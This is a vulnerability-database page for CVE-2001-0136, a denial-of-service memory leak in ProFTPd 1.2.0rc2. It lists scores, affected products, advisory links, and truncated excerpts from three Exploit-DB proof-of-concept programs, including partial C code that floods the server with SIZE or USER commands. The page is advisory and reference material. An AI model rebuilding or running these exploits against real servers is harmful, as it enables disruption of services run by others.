CVE-2001-0136
published 2001-03-12CVE-2001-0136: Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server…
PriorityP423medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
44.94%
98.6th percentile
Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| mandrakesoft | mandrake_linux | — | — |
| proftpd | proftpd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ProFTPd 1.2.0 pre10 - Remote Denial of Service
exploitdb·2001-01-12
CVE-2001-0136 ProFTPd 1.2.0 pre10 - Remote Denial of Service
ProFTPd 1.2.0 pre10 - Remote Denial of Service
---
/* ProFTPd DoS version 1.1
Remote DoS in proFTPd
Code by: JeT-Li -The Wushu Master- [email protected]
Recently I posted a remote DoS for ProFTPd based in the multiple use
of the SIZE command in order to crash the system. Now and thanks to
the information provided by Wojciech Purczynski I have coded a
program that not only use the SIZE command but also the USER command.
So at this time access to the ftp is not necessary to manage a DoS
attack. The concept is equal to the last exploit one, but using
multiple USER instead of SIZE.
You don't have to give arguments when you execute the program, it
will request you these.
Greets: _kiss_ (the real fucker ;-P); gordoc (no comment, the most
hax man in the w0rld); Perip|o (tibe
Exploit-DB
ProFTPd 1.2.0 rc2 - Memory Leakage
exploitdb·2001-01-03
CVE-2001-0136 ProFTPd 1.2.0 rc2 - Memory Leakage
ProFTPd 1.2.0 rc2 - Memory Leakage
---
/*
| Proftpd DoS
| by Piotr Zurawski ([email protected])
| This source is just an example of memory leakage in proftpd-1.2.0(rc2)
| server discovered by Wojciech Purczynski.
|
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define USERNAME "anonymous"
#define PASSWORD "[email protected]"
#define HOWMANY 10000
void logintoftp();
void sendsizes();
int fd;
struct in_addr host;
unsigned short port = 21;
int tcp_connect(struct in_addr addr,unsigned short port);
int main(int argc, char **argv)
{
if (!resolve(argv[1],&host))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
fd=tcp_connect(host,port);
logintoftp(fd);
printf("Logged\n");
sendsizes(fd);
printf("Now check out memo
Exploit-DB
ProFTPd 1.2 - 'SIZE' Remote Denial of Service
exploitdb·2000-12-20
CVE-2001-0136 ProFTPd 1.2 - 'SIZE' Remote Denial of Service
ProFTPd 1.2 - 'SIZE' Remote Denial of Service
---
source: https://www.securityfocus.com/bid/2185/info
A memory leak has been reported in all versions of ProFTPd.
The SIZE FTP command causes the server to misallocate and leak small amounts of memory each time the command is executed.
If a sufficient number of these commands are executed by the server, substantial amounts of system memory can be consumed, allowing a remote attacker to carry out a denial of service attack on the affected host.
This could be problematic if anonymous FTP is enabled or if a malicious local user has been supplied with an FTP login ID.
/* ProFTPd DoS version 1.1
Remote DoS in proFTPd
Code by: JeT-Li -The Wushu Master- [email protected]
Recently I posted a remote DoS for ProFTPd based in the multiple us
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2001-01/0122.htmlhttp://archives.neohapsis.com/archives/bugtraq/2001-01/0132.htmlhttp://archives.neohapsis.com/archives/bugtraq/2001-02/0267.htmlhttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000380http://www.debian.org/security/2001/dsa-029http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-021.php3http://www.securityfocus.com/archive/1/152206https://exchange.xforce.ibmcloud.com/vulnerabilities/5801http://archives.neohapsis.com/archives/bugtraq/2001-01/0122.htmlhttp://archives.neohapsis.com/archives/bugtraq/2001-01/0132.htmlhttp://archives.neohapsis.com/archives/bugtraq/2001-02/0267.htmlhttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000380http://www.debian.org/security/2001/dsa-029http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-021.php3http://www.securityfocus.com/archive/1/152206https://exchange.xforce.ibmcloud.com/vulnerabilities/5801
2001-03-12
Published